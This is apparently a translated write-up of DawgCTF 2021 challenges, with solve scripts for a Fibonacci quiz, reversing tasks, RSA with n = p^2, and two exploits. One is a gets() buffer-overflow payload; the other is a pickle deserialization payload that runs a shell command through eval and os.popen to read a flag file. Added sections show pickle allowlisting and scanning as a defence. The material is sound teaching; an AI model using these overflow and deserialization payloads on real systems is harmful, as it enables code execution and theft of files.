5un9hun

2021 Dawg CTF Write-Up


MISC

1. Two Truths and a Fib (100)

Problem

image

Solve

image

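As shown above, connecting to the nc server gives a description and a question; it seems you have to enter which of the three numbers is a Fibonacci number. The input closes very quickly, before you can even type an answer.

So the data has to be sent with pwntools. To say it up front, there was not one question but 100 in total, so the Fibonacci number has to be entered for all 100 questions. I therefore generated the Fibonacci numbers in advance, parsed the data with pwntools, and wrote a script that sends the number that appears in the Fibonacci list.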

Script

from pwn import *

r = remote('umbccd.io', 6000)

def create_fibo():
    # Precompute the first 100 Fibonacci numbers for membership tests.
    x = [0, 1]
    for i in range(2, 100):
        x.append(x[i-1] + x[i-2])
    return set(x)

def fib(fibo):
    # Consume output up to the opening bracket of the candidate list.
    r.recvuntil(b'Correct!\n', timeout=5)
    r.recvuntil(b'[', timeout=5)

    # Read up to the closing bracket and split into the candidate numbers.
    data = r.recvuntil(b']', timeout=5)[:-1].decode().split(', ')

    print(data)

    # Answer with the candidate that is a Fibonacci number.
    result = ''
    r.recvuntil(b'>> ', timeout=5)
    for value in data:
        if int(value) in fibo:
            result = value
    print(result)
    r.sendline(result.encode())

fibo = create_fibo()
for i in range(100):
    fib(fibo)

r.interactive()

Result

image image

FLAG

FLAG : DawgCTF{jU$T_l1k3_w3lc0me_w33k}

PWN

1. Bofit (125)

Problem

image

Solve

The provided C file looks like this.

#include <stdio.h>
#include <stdbool.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>

void win_game(){
	char buf[100];
	FILE* fptr = fopen("flag.txt", "r");
	fgets(buf, 100, fptr);
	printf("%s", buf);
}

int play_game(){
	char c;
	char input[20];
	int choice;
	bool correct = true;
	int score = 0;
	srand(time(0));
	while(correct){
		choice = rand() % 4;
		switch(choice){
			case 0:
				printf("BOF it!\n");
				c = getchar();
				if(c != 'B') correct = false;
				while((c = getchar()) != '\n' && c != EOF);
				break;

			case 1:
				printf("Pull it!\n");
				c = getchar();
				if(c != 'P') correct = false;
				while((c = getchar()) != '\n' && c != EOF);
				break;

			case 2:
				printf("Twist it!\n");
				c = getchar();
				if(c != 'T') correct = false;
				while((c = getchar()) != '\n' && c != EOF);
				break;

			case 3:
				printf("Shout it!\n");
				gets(input);
				if(strlen(input) < 10) correct = false;
				break;
		}
		score++;
	}
	return score;
}

void welcome(){
	char input;
	printf("Welcome to BOF it! The game featuring 4 hilarious commands to keep players on their toes\n");
	printf("You'll have a second to respond to a series of commands\n");
	printf("BOF it: Reply with a capital \'B\'\n");
	printf("Pull it: Reply with a capital \'P\'\n");
	printf("Twist it: Reply with a capital \'T\'\n");
	printf("Shout it: Reply with a string of at least 10 characters\n");
	printf("BOF it to start!\n");
	input = getchar();
	while(input != 'B'){
		printf("BOF it to start!\n");
		input = getchar();
	}
	while((input = getchar()) != '\n' && input != EOF);
}

int main(){
	int score = 0;
	welcome();
	score = play_game();
	printf("Congrats! Final score: %d\n", score);
	return 0;
}

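The win_game function is the one that gives the flag. Looking at main, it calls welcome and then play_game.
In play_game, three games are run at random, and in case 3, the Shout it! branch, gets reads input with no length limit, so a BOF occurs. Using this, overwriting ret with the win_game function and then leaving the loop yields the flag.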

Script

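from pwn import *

r = remote('umbccd.io', 4100)

# Address of win_game
win = 0x401256

# 56 bytes of padding, then the new return address
payload = b''
payload += b'A'*(56 - 8)
payload += b'B'*8
payload += p64(win)

# Start the game
r.sendline(b'B')

# Only overflows when the prompt is "Shout it!" (the gets call)
r.sendline(payload)

# A wrong/short reply sets correct = false, so play_game returns
r.sendline(b'!')

r.interactive()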

Since the case is random, running it until case 3 comes up prints the flag.

Result

image

FLAG

FLAG : DawgCTF{n3w_h1gh_sc0r3!!}

2. Jellyspotters (100)

Problem

image

Solve

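Connecting to the nc server shows an interface where commands are entered, as follows.
image

Entering help gave the following.
image

Among the commands, import stood out, so I tried import os. It raised an error, which showed that the pickle module is being used.
image

So I used the pickle serialization vulnerability and had the server deserialize a payload that reads ~/flag.txt.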

Script

import pickle
import base64

class exploit(object):
    def __reduce__(self):
        return (eval, ("__import__('os').popen('cat ~/flag.txt').read()",))

data = base64.b64encode(pickle.dumps(exploit())).decode('utf8')
print(data)

Result

gASVSwAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwvX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IH4vZmxhZy50eHQnKS5yZWFkKCmUhZRSlC4=

Importing this value should produce the flag.

image

However, the output comes out with line breaks everywhere. I just collected the pieces one by one.

FLAG

FLAG : DawgCTF{funn13st_s#$&_ive_3v3r_s33n}
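
The defensive counterpart to the payload above, as an added example that is not part of the original write-up or the challenge's code: an unpickler that refuses any global outside an allowlist, plus a static scan that lists what a pickle would import without loading it. `ALLOWED_GLOBALS`, `safe_loads` and `referenced_globals` are hypothetical names, and the sample payload is constructed and harmless.

```python
import base64
import io
import pickle
import pickletools

# Hypothetical allowlist: the only globals a stored object may reference.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)


def safe_loads(b64_text):
    """Decode base64 and unpickle with the allowlist enforced."""
    raw = base64.b64decode(b64_text, validate=True)
    return RestrictedUnpickler(io.BytesIO(raw)).load()


def referenced_globals(b64_text):
    """List the (module, name) pairs a pickle would import, without loading it."""
    raw = base64.b64decode(b64_text, validate=True)
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(raw):
        if opcode.name == "GLOBAL":            # protocols 0-3: "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL":    # protocol 4+: two pushed strings
            # Heuristic: take the two most recent string pushes.
            found.append(tuple(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class ConstructedPayload:
    """Constructed sample shaped like the write-up's payload, but harmless."""

    def __reduce__(self):
        return (eval, ("'constructed'.upper()",))


def constructed_samples():
    """Return (hostile, benign) base64 pickles built for this example."""
    hostile = base64.b64encode(pickle.dumps(ConstructedPayload())).decode()
    benign = base64.b64encode(
        pickle.dumps({"name": "moon jelly", "count": 3})).decode()
    return hostile, benign


if __name__ == "__main__":
    hostile, benign = constructed_samples()
    print("globals in hostile sample:", referenced_globals(hostile))
    try:
        safe_loads(hostile)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
    print("benign sample loads as:", safe_loads(benign))
```

Plain containers and scalars need no globals at all, so an import-style feature that only stores such data can run with an empty allowlist.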

REVERSING

1. Calculator (50)

Problem

image

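A single exe file is given. It is a 32-bit program, so I used x32dbg.

Solve

I collected the strings with x32dbg.

image
There was a suspicious string, so I set a breakpoint near it and ran the program. Note that arguments have to be supplied. In x32dbg, arguments to main are passed as follows.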

[File] -> [Change Command Line] -> append the arguments after the command

I simply passed 10 4.

image

A branch occurs there; out of laziness I just changed the branch to go straight to the next instruction.

image

Continuing execution after that prints the flag in the running cmd window.

Result

image

FLAG

FLAG : DawgCTF{c4LcU14T0r_64}

2. Secret App (50)

Problem

image
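This problem is similar to Calculator.

Solve

I searched the strings first and again found a suspicious string.
image

So I went to where the string is used, set a suitable breakpoint, and ran the program.

image

This time, changing the branch did not print the flag. It seemed that the username and password have to be correct for the flag to be completed. So I analysed what the username and password are while running the program.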

username = not_username  
password = not_password  

I confirmed that the strings above have to be entered to reach the correct branch.

So entering each of these values prints the flag.

Result

image

FLAG

FLAG : DawgCTF{4pp_sup3r_53cret}

3. Sections (75)

Problem

image

Solve

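Running the program prints the sentence hi. xor valid section data and then exits. Analysing it with x32dbg showed nothing much. Since the challenge is called sections, I checked the PE sections with PEView.

image

In the section list, SECTION .flag looked suspicious, and when I checked it

image

there were hexadecimal numbers. It seemed that some operation on the hex values would turn them into the FLAG.

Since the challenge mentions xor, I performed an XOR operation. The flag format is DawgCTF{}, so I XORed the hex values of D and a with 0x32 and 0x19, the values in the .flag section, respectively.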

0x44 xor 0x32 = 0x78  
0x61 xor 0x19 = 0x78  
...

Computing the values that follow gave the same 0x78. So XORing each hex value with 0x78 (120) and writing the result as ASCII gives the flag.

Script

flag = [0x3c, 0x19, 0x0f, 0x1f, 0x3b, 0x2c,
        0x3e, 0x03, 0x4d,0x4b, 0x1b, 0x0c,
        0x11, 0x17, 0x16, 0x0b, 0x59, 0x59, 0x05]

xor = 120

result = ''

for i in flag:
    result += chr(i ^ xor)
print(result)

Result

DawgCTF{53ctions!!}

FLAG

FLAG : DawgCTF{53ctions!!}

CRYPTO

1. Really Secure Algorithm (150)

Problem

image

Solve

The problem file is as follows.

n: 10634942386369053306718982791230207017222411778387428228121739787277202698284647961774663318166753009972197604733991508993381905034994413046123395012957131749063197440949455658446643723659214094302293569346821565572498267231470316528434338593447187684931835225249954803771387437983103137834087253214198708435548221506015363737359234192763436166774404427745442039457066411525171374774426844403297790769815352938674708912765947400582029834152518834262423865088491309599054329616549109571473131167599211736547290711529816825547925844628635346179433849886320321308350879769574528635811613994542953897538499541956243567792811964937287326434456493560331584618675333988922650002285581462884244802328206130346898165603199297059592903762655509140584483433081611731004731616438344755488886763565725811291933951246105581726365056970719287783504527262290983870205878146347120351717123130350121094217926431884057528492781902874141083087346385195932820320827681533312763174402246451570725608781950048471852177417528464844304590470142053685511756411869629667317319461287861119946685285791027377649645214374850376951617750366224112187395492865771090286262201504527058545969947512358946102273002220706781060232921385804965171772680427709343911857981815986185633328724194012239038068124043106651749418437277929997456555341088891303251892412670390925011291735201944893295927767896482442632204372615944470668331750267488306944962357560296880615594491094002484493661438224468938513104441521685313908805122803590964383031243981553979101387996609412434644766420411042253189101751439885106144454945980985584263006122946678314010955388511818710314665808089421022392971829777854010874602263450452901473719312847257561791517915393106033401965864804940336735226376774232212023524936532864306919312736766490620375708510835357227382078025746437739750067886464679816933969259229305737669147435661110124622156538724177264751227753776415917784441418167334620356907355439905567678914433013129411688286198500077931976932950023469773
18117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
e: 32208020651825609144389953329783858280690346218921262349245952952739836285357880772333174889209128147648969167432239682589356898173118659717565785146096469208358722423183030459575320027691535338844032397369672317712000786666151091193442335221658610603139700212751916385810719276612866570054098581444351127400446969512892717245497621978714670656295439269831502694925732252944134902978322816718115874435682857546011427267595238813034487417519539388124866175334288830036896947047754115288840825668325102811000574117263677627961948366872366051202611236580053903553850063590428170273347512733914038571400656015307161027978030301884837232535959873928396813881633312576425340332577300260765291388248407890277582716904840103139326395516669521784140001785597972431722587229453149245162424703280952408271428104387312746183205138351129879682036945335896082416268436274193860408421043562309932862202841971029032568338037872608500715890398293291221431415822392121972475971726613624670383044699330998059507311000180448305833946141246069391141643072855849504887359768594208953137373457863834973893008691003800308829494094269203099804704139315274752627808857423875502747401926553905452749140175716501150547058264790040149227340284770317016284725915916131909491075365983214796496905229685956176929882588159375359212170889703572887379515947592674980699873781250186866551394666635294149708665181855387160641728135259923468818354721267535362602315142698264066447413637737411002353248110156587035984662174832634951646793861415583446263906159239026645116997125001049149737907386878610682157044825318204290624068283306778340957473540073932931181005309453081147700297346443265175581124615150901128785807729829598795491588919910032869573023309622691252632914447819812109648939608387612954251660296986696137642368564776788568055975709420857412441149601729106022838894955606523533380214286555784491353527657253528267140402023776340555847702015291010501900836423731533004760525738069636787141720725483397906434265066418130906
7142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
c: 32988927857804401682431374152770522962482635438011319985183776456374687223380702111369337177807274702330319366139125691765467357974898361910122933777699557498910152529557863298191877723203822267994926437216741898103851916435904619339779483357569229483827091913721250359464475688487990510238201361671679576605580638067507912219326193720215272737230703519770267140700893390672358015884389693916088988187494597642382941487773526969072771134787261586408462763195640317733818578010077856454897688429908645342172516342801790894932596690453029106902558409702269581651162658948525761566453277419455580901776362219772815645368005930080827747155845081800438475174619031791050177267121911751474658404592805648790411272080117660988974017328813007378868701054422025081437846724961124395369083140652345596063995702993781977539856122859946753671502095413697028313768861348610937088354721831416311961381076425933493320943507892685674740393357868572427107598813626896752080802533900186361419309207510699581135511621377805703725662572923804002081009626691739421361731991402629109330989748355731762569613329801332674662967326555846813560269067470493991017233855603596784015722885999776521924109555175825388931261069195644598465753508254646042034980837270230780769703777866858572031864024633421665005435303650530155038762008914433138307679160494417153112186100987280702256997142503488795539320744508658752897263178210426161062522698248479891569553249266682264910568086878255450124681815681504353485720407805774860728982238746252937368351167227070847427307857415364926366692726841352098419126508664772891269241860909332519482616186942827013820943021573929018161757974593963939260849859640027401410343574746226204558662461310997095476244524762818703177439363928668920144997064628856099696945614551829073237578377995060190126875188837424763480434609007076220280931242172553793805972314883174538476596187535991775470857026290932377497372810173504648938511683909815490576128956503066093285883940245768470460589470193922658
6411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055

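Since N, e and C are given, this is an RSA problem. Wiener's attack did not work, and I thought it would be enough to factor N, use phi to get d, and compute C^d % N, but that did not work.

The slightly suspicious point was that when N was factored, p and q were the same, that is, p^2 = N. In this case the phi value has to be (p - 1) * p, not (p - 1) * (p - 1). So setting phi to (p - 1) * p gives the flag.

Another curious point is that the flag also came out with phi set to (n - 1) * n instead of (p - 1) * p. I should look into this separately.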

Script

from Crypto.Util.number import long_to_bytes, inverse

n = 1063494238636905330671898279123020701722241177838742822812173978727720269828464796177466331816675300997219760473399150899338190503499441304612339501295713174906319744094945565844664372365921409430229356934682156557249826723147031652843433859344718768493183522524995480377138743798310313783408725321419870843554822150601536373735923419276343616677440442774544203945706641152517137477442684440329779076981535293867470891276594740058202983415251883426242386508849130959905432961654910957147313116759921173654729071152981682554792584462863534617943384988632032130835087976957452863581161399454295389753849954195624356779281196493728732643445649356033158461867533398892265000228558146288424480232820613034689816560319929705959290376265550914058448343308161173100473161643834475548888676356572581129193395124610558172636505697071928778350452726229098387020587814634712035171712313035012109421792643188405752849278190287414108308734638519593282032082768153331276317440224645157072560878195004847185217741752846484430459047014205368551175641186962966731731946128786111994668528579102737764964521437485037695161775036622411218739549286577109028626220150452705854596994751235894610227300222070678106023292138580496517177268042770934391185798181598618563332872419401223903806812404310665174941843727792999745655534108889130325189241267039092501129173520194489329592776789648244263220437261594447066833175026748830694496235756029688061559449109400248449366143822446893851310444152168531390880512280359096438303124398155397910138799660941243464476642041104225318910175143988510614445494598098558426300612294667831401095538851181871031466580808942102239297182977785401087460226345045290147371931284725756179151791539310603340196586480494033673522637677423221202352493653286430691931273676649062037570851083535722738207802574643773975006788646467981693396925922930573766914743566111012462215653872417726475122775377641591778444141816733462035690735543990556767891443301312941168828619850007793197693295002346977
318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
e = 3220802065182560914438995332978385828069034621892126234924595295273983628535788077233317488920912814764896916743223968258935689817311865971756578514609646920835872242318303045957532002769153533884403239736967231771200078666615109119344233522165861060313970021275191638581071927661286657005409858144435112740044696951289271724549762197871467065629543926983150269492573225294413490297832281671811587443568285754601142726759523881303448741751953938812486617533428883003689694704775411528884082566832510281100057411726367762796194836687236605120261123658005390355385006359042817027334751273391403857140065601530716102797803030188483723253595987392839681388163331257642534033257730026076529138824840789027758271690484010313932639551666952178414000178559797243172258722945314924516242470328095240827142810438731274618320513835112987968203694533589608241626843627419386040842104356230993286220284197102903256833803787260850071589039829329122143141582239212197247597172661362467038304469933099805950731100018044830583394614124606939114164307285584950488735976859420895313737345786383497389300869100380030882949409426920309980470413931527475262780885742387550274740192655390545274914017571650115054705826479004014922734028477031701628472591591613190949107536598321479649690522968595617692988258815937535921217088970357288737951594759267498069987378125018686655139466663529414970866518185538716064172813525992346881835472126753536260231514269826406644741363773741100235324811015658703598466217483263495164679386141558344626390615923902664511699712500104914973790738687861068215704482531820429062406828330677834095747354007393293118100530945308114770029734644326517558112461515090112878580772982959879549158891991003286957302330962269125263291444781981210964893960838761295425166029698669613764236856477678856805597570942085741244114960172910602283889495560652353338021428655578449135352765725352826714040202377634055584770201529101050190083642373153300476052573806963678714172072548339790643426506641813090
67142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
c = 3298892785780440168243137415277052296248263543801131998518377645637468722338070211136933717780727470233031936613912569176546735797489836191012293377769955749891015252955786329819187772320382226799492643721674189810385191643590461933977948335756922948382709191372125035946447568848799051023820136167167957660558063806750791221932619372021527273723070351977026714070089339067235801588438969391608898818749459764238294148777352696907277113478726158640846276319564031773381857801007785645489768842990864534217251634280179089493259669045302910690255840970226958165116265894852576156645327741945558090177636221977281564536800593008082774715584508180043847517461903179105017726712191175147465840459280564879041127208011766098897401732881300737886870105442202508143784672496112439536908314065234559606399570299378197753985612285994675367150209541369702831376886134861093708835472183141631196138107642593349332094350789268567474039335786857242710759881362689675208080253390018636141930920751069958113551162137780570372566257292380400208100962669173942136173199140262910933098974835573176256961332980133267466296732655584681356026906747049399101723385560359678401572288599977652192410955517582538893126106919564459846575350825464604203498083727023078076970377786685857203186402463342166500543530365053015503876200891443313830767916049441715311218610098728070225699714250348879553932074450865875289726317821042616106252269824847989156955324926668226491056808687825545012468181568150435348572040780577486072898223874625293736835116722707084742730785741536492636669272684135209841912650866477289126924186090933251948261618694282701382094302157392901816175797459396393926084985964002740141034357474622620455866246131099709547624452476281870317743936392866892014499706462885609969694561455182907323757837799506019012687518883742476348043460900707622028093124217255379380597231488317453847659618753599177547085702629093237749737281017350464893851168390981549057612895650306609328588394024576847046058947019392265
86411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055

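# n, e and c are each a single integer (the long values above wrap onto a second line).
# n = p^2, so p is the integer square root of n.
from math import isqrt
p = isqrt(n)

# For n = p^2 the totient is (p - 1) * p, not (p - 1) * (p - 1).
phi = (p - 1) * p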

d = inverse(e, phi)

M = pow(c,d,n)

print(long_to_bytes(M))

Result

b'DawgCTF{sm@ll_d_b1g_dr3am5}'

FLAG

FLAG : DawgCTF{sm@ll_d_b1g_dr3am5}

2. The Obligatory RSA Challenge (200)

Problem

image

Solve

The problem file is as follows.

n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
e = 65537
c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536

In this problem too, n has the form p^2; as in the Really Secure Algorithm problem, computing phi = (p - 1) * p,
deriving d, and then computing C^d % N prints the flag.

Script

from Crypto.Util.number import long_to_bytes, inverse

n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
e = 65537
c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536

p = 21816257788879800226266741950501282709401872894176288619472731956291218914324742537604641219560786978413613510633536886641581153942571579359519401327796021367732695476711467566761398025402445133259848384123905962932802004021079944067083532491720877926448099933753336517689984808846750048960375488528766110009254176926887611598941876012437215971816681184483796662759984833863168641346915636162467824574775331116852844756225674938392321848711476249893809700776552828990831593983374320915711192051109410295925205263499219444742867868898381959251178728127024835656647566724333855154762699836449704050690295585931350731821

phi = (p-1)*(p)

d = inverse(e, phi)

M = pow(c,d,n)

print(long_to_bytes(M))

Result

b'DawgCTF{wh0_n33ds_Q_@nyw@y}'

FLAG

FLAG : DawgCTF{wh0_n33ds_Q_@nyw@y}
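
Both RSA challenges above use n = p^2. The following is an added example, not code from the original write-up, that compares the three phi choices discussed there on a small constructed prime and shows why (n - 1) * n also decrypts: it is a multiple of p * (p - 1). The function names and the parameters p = 1000003, e = 65537 are assumptions made for the demonstration.

```python
from math import gcd, isqrt


def square_root_factor(n):
    """Return p when n == p * p, otherwise None."""
    p = isqrt(n)
    return p if p * p == n else None


def decrypt_with(c, e, n, modulus_for_d):
    """Decrypt c with d = e^-1 mod modulus_for_d; None if e is not invertible."""
    if gcd(e, modulus_for_d) != 1:
        return None
    d = pow(e, -1, modulus_for_d)
    return pow(c, d, n)


def compare_phi_choices(p, e, m):
    """Encrypt m under n = p^2 and report which 'phi' candidates decrypt it."""
    n = p * p
    if m % p == 0:
        raise ValueError("m must be coprime to p for the round trip to hold")
    c = pow(m, e, n)
    candidates = {
        # Formula for two distinct primes, misapplied to p = q.
        "(p-1)*(p-1)": (p - 1) * (p - 1),
        # Order of the multiplicative group mod p^2.
        "p*(p-1)": p * (p - 1),
        # n*(n-1) = p*(p-1) * p*(p+1): a multiple of the real phi, so
        # e*d = 1 (mod n*(n-1)) also gives e*d = 1 (mod p*(p-1)).
        "n*(n-1)": n * (n - 1),
    }
    return {label: decrypt_with(c, e, n, mod) == m
            for label, mod in candidates.items()}


if __name__ == "__main__":
    # Constructed small parameters, not the challenge values.
    p, e = 1000003, 65537
    m = int.from_bytes(b"flag", "big")
    print("recovered p:", square_root_factor(p * p))
    for label, ok in compare_phi_choices(p, e, m).items():
        print(f"phi = {label:12} -> decrypts correctly: {ok}")
```

Running `square_root_factor` on a received modulus is also a cheap key-validation check: a non-None result means the key can be factored immediately.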
